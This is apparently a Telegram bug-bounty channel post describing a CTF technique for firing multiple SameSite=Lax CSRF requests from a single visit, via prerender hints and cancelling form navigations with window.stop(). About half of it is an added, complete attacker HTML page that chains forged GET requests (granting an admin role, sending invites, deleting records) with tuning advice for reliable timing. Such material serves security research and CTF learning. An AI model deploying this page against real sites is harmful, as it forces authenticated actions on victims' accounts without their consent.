BugBounty & Hacking Resources – Telegram
During a recent CTF, one participant found a particularly interesting solution to my challenge. The goal was to send multiple CSRF requests with SameSite=Lax from 1 visit.
Normally, a form sends you to the page you are posting to and you cannot send any more CSRF requests.

My intended solution was to use <link rel="prerender" href="..."> to send an authenticated GET request to the CSRF-able endpoint, repeatable without leaving the attacker's page. Prerender represents the full navigation as closely as possible, sending SameSite=Lax cookies.

The unintended technique was something I hadn't seen before. Regular CSRFs often use <form>s for top-level navigations, but it seems like we cannot control the browser anymore after submitting the form.
But, by cancelling the navigation, it is possible to regain control.

After the request is sent, while waiting for a response from the target, call window.stop() or submit another form to cancel the previous form. Timing can be measured and is surprisingly consistent. Check out the PoCs here:

https://gist.github.com/JorianWoltjer/b9163fe616319db8fe570b4ef9c02291

reference:
https://x.com/J0R1AN/status/1842139861295169836

#csrf #twitter
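The two techniques from the post, written out as a single attacker page. This is an added example, not Jorian's PoC from the gist: the target origin (`target.example`), the endpoint paths and the parameter names are placeholders, and the 300 ms cancel delay is an assumed value that has to be measured against the real target as the post describes. Both techniques rely on the requests being top-level navigations, which is why SameSite=Lax cookies are attached.

```html
<!-- Added example, not from the original post or gist. Everything under
     target.example is a placeholder standing in for the CSRF-able endpoints. -->
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>multi-request Lax CSRF</title>

  <!-- Technique 1 (the intended solution): prerender hints. Each hint makes the
       browser issue a navigation-like GET carrying SameSite=Lax cookies, and the
       attacker page stays in the foreground, so several can be listed at once.
       Chromium-specific behaviour; verify it in the browser version you target. -->
  <link rel="prerender" href="https://target.example/settings?role=admin&amp;user=attacker">
  <link rel="prerender" href="https://target.example/invite?email=attacker%40example.com">
</head>
<body>
<script>
  // Technique 2 (the unintended solution): submit a top-level form, then abort the
  // navigation with window.stop() while the response is still in flight. The request
  // has already left the browser by then; cancelling only throws the response away,
  // and this page keeps running, so the next form can be submitted.
  const TARGET = 'https://target.example/';           // placeholder origin
  const CANCEL_AFTER_MS = 300;                        // assumed; measure per target

  // Constructed sequence of CSRF-able GET endpoints (placeholders).
  const requests = [
    ['settings', { role: 'admin', user: 'attacker' }],
    ['invite',   { email: 'attacker@example.com' }],
    ['remove',   { id: '42' }],
  ];

  // Build a GET form for one endpoint. GET is used deliberately: explicit
  // SameSite=Lax cookies are only attached to safe-method top-level navigations.
  // A POST form would only work for cookies set without any SameSite attribute
  // within the last two minutes (Chromium's "Lax+POST" exception).
  function buildForm(path, params) {
    const form = document.createElement('form');
    form.method = 'GET';
    form.action = TARGET + path;
    for (const [name, value] of Object.entries(params)) {
      const input = document.createElement('input');
      input.type = 'hidden';
      input.name = name;
      input.value = value;
      form.appendChild(input);
    }
    document.body.appendChild(form);
    return form;
  }

  function fire(i) {
    if (i >= requests.length) return;
    const [path, params] = requests[i];
    buildForm(path, params).submit();     // navigation starts, request goes out
    setTimeout(() => {
      window.stop();                      // abort before the response lands
      fire(i + 1);                        // submitting the next form would also cancel the previous one
    }, CANCEL_AFTER_MS);
  }

  fire(0);
</script>
</body>
</html>
```

If the delay is too long the target's response arrives first and the page navigates away, ending the chain; if it is too short the request may not have been sent yet. Measuring the round-trip to the target from the victim's network position, as the post suggests, is what makes the value reliable.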
Attacking Secondary Contexts in Web Applications.pdf (2.7 MB)

Really great!🔥